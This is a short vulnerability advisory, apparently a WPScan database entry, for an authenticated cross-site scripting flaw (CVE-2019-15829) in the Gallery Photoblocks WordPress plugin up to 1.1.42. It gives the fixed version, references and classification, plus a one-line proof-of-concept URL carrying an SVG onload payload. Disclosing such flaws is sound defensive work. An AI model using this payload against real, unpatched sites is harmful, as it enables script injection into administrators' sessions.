Gallery Photoblocks <= 1.1.42 - Authenticated XSS



Proof of Concept
When logged in with an account that has administrator capabilities, visit:
https://<BLOG>/wp-admin/admin.php?page=photoblocks-edit&id="><svg/onload=alert(/XSS/)>

Affects Plugin

Fixed in version 1.1.43

References

CVE: CVE-2019-15829
URL: https://plugins.trac.wordpress.org/changeset/2119693

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Verified: Yes
WPVDB ID: 9443

Timeline

Publicly Published: 2019-07-09 (2 months ago)
Added: 2019-07-09 (2 months ago)
Last Updated: 2019-08-30 (22 days ago)
